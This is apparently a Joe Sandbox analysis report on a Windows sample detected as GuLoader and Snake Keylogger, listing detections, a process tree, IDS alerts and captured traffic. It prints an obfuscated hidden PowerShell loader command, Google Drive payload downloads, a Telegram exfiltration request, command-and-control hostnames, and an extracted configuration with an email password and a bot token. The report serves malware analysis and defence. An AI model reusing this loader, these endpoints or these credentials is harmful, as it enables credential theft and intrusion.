Edit tour

Windows Analysis Report
cqWZtEH4eJ.exe

Overview

General Information

Sample name:	cqWZtEH4eJ.exe renamed because original name is a hash value
Original sample name:	1eface4a669563e22a5aa35131e3c3b3da273361c13bdf989fb5b2049fbcae4b.exe
Analysis ID:	1632347
MD5:	218330299346a6935455dfab57ec8ac3
SHA1:	df2efa883b7225fda2c790cf535cf87a05ab5880
SHA256:	1eface4a669563e22a5aa35131e3c3b3da273361c13bdf989fb5b2049fbcae4b
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

cqWZtEH4eJ.exe (PID: 5128 cmdline: "C:\Users\user\Desktop\cqWZtEH4eJ.exe" MD5: 218330299346A6935455DFAB57EC8AC3)

powershell.exe (PID: 5288 cmdline: powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 856 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "dalila.russo@novacitacor.pt", "Password": "#Novasystem123#", "Host": "mail.novacitacor.pt", "Port": "587", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.1752763679.0000000009FA4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 856	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 856	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.181.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 856, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49690

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5288, TargetFilename: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) ", CommandLine: powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cqWZtEH4eJ.exe", ParentImage: C:\Users\user\Desktop\cqWZtEH4eJ.exe, ParentProcessId: 5128, ParentProcessName: cqWZtEH4eJ.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) ", ProcessId: 5288, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:34:15.221143+0100	2803305	3	Unknown Traffic	192.168.2.6	49694	104.21.16.1	443	TCP
2025-03-07T22:34:22.502330+0100	2803305	3	Unknown Traffic	192.168.2.6	49698	104.21.16.1	443	TCP
2025-03-07T22:34:29.193488+0100	2803305	3	Unknown Traffic	192.168.2.6	49702	104.21.16.1	443	TCP
2025-03-07T22:34:32.251185+0100	2803305	3	Unknown Traffic	192.168.2.6	49704	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:34:09.914140+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49692	132.226.8.169	80	TCP
2025-03-07T22:34:12.945457+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49692	132.226.8.169	80	TCP
2025-03-07T22:34:16.086330+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49695	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:34:02.916905+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49690	142.250.181.238	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:34:42.727143+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	49709	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: cqWZtEH4eJ.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe

Avira: detection malicious, Label: TR/Injector.optgl

Found malware configuration

Source: 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "dalila.russo@novacitacor.pt", "Password": "#Novasystem123#", "Host": "mail.novacitacor.pt", "Port": "587", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe	Virustotal: Detection: 70%			Perma Link

Multi AV Scanner detection for submitted file

Source: cqWZtEH4eJ.exe	Virustotal: Detection: 70%			Perma Link
Source: cqWZtEH4eJ.exe	ReversingLabs: Detection: 57%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: cqWZtEH4eJ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49693 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.6:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49709 version: TLS 1.2

Source: cqWZtEH4eJ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.1742599713.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\System.Core.pdb] source: powershell.exe, 00000002.00000002.1751763433.00000000080EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5. source: powershell.exe, 00000002.00000002.1735564109.0000000002930000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Code function: 0_2_00406448 FindFirstFileA,FindClose,	0_2_00406448
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040589C
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02DEF938h	4_2_02DEF630
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02DEFE00h	4_2_02DEFAF9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C42C48h	4_2_24C42830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C42681h	4_2_24C423D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4FBF0h	4_2_24C4F8F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_24C40040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4F6F9h	4_2_24C4F450
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_24C40853
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4D2A9h	4_2_24C4D000
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C42C48h	4_2_24C42826
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4DC49h	4_2_24C4D9A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4D7F1h	4_2_24C4D548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4E9A1h	4_2_24C4E6F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4E549h	4_2_24C4E2A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_24C40673
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4E0C9h	4_2_24C4DE20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4F2A1h	4_2_24C4EFF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4EDF9h	4_2_24C4EB50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4CE01h	4_2_24C4CB58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C42C48h	4_2_24C42B76
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C4C9A9h	4_2_24C4C700
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C40D0Dh	4_2_24C40B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 24C416F8h	4_2_24C40B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_25217668

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49709 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:46:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49695 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49692 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49702 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49694 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49698 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49690 -> 142.250.181.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49704 -> 104.21.16.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49693 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:46:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:34:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.1751274102.000000000807B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: cqWZtEH4eJ.exe, cqWZtEH4eJ.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: cqWZtEH4eJ.exe, cqWZtEH4eJ.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1736319849.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1742599713.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
